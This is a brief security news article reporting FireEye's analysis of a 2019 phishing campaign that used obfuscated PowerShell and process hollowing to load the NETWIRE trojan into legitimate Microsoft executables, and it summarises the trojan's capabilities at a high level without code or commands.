Researchers have come across a new phishing campaign in which attackers targeted multiple customers by using a fileless code injection attack. Dubbed as ‘Process Hollowing’, the technique involved the use of VBScript, PowerShell, and the .NET framework. The phishing campaign was discovered in February 2019.
How does it work - According to the researchers from FireEye, it is found that attackers abused the functionality of loading .NET assembly in order to execute malware directly into the memory of PowerShell. This enabled the cybercriminals to evade detection as it did not need the creation of any PE files on the disk.
The campaign heavily relies on cloud-based storage services that bypass restrictions to host their payloads. Here, the users are prompted to open a document stored on Google Drive. One such file was used to target members of the airline industry that use a particular aircraft model.
If the user opens the doc, it executes a PowerShell script after multiple levels of obfuscation. This PowerShell script loads a .NET assembly from a remote URL, which acts a downloader for the final payload - NETWIRE trojan.
“Upon execution, after multiple levels of obfuscation, a PowerShell script is executed that loads a .NET assembly from a remote URL, functions of which are then used to inject the final payload (NETWIRE Trojan) into a benign Microsoft executable using process hollowing. This can potentially bypass application whitelisting since all processes spawned during the attack are legitimate Microsoft executables,” said FireEye in its report.
What are NETWIRE's capabilities - Once installed, the NETWIRE backdoor trojan connects with the C2 server of the attackers to receive further commands and send back the collected user data.
The capabilities of the NETWIRE trojan includes keylogging, reverse shell, and password theft. The backdoor uses a custom encryption algorithm to encrypt data and then write it to a file created in the ./LOGS directory. It can also capture session login details, capture system details, take screenshots, monitor CPU usage and create fake HTTP proxy.
“The malware also contains a custom obfuscation algorithm to hide registry keys, APIs, DLL names, and other strings from static analysis,” FireEye added.
The bottom line - FireEye claims that malware authors will continue to use different fileless process execution techniques to evade detection and further their attack processes. Such attack methods are more effective as it includes “the lack of visibility into .NET process execution combined with the flexibility of PowerShell.”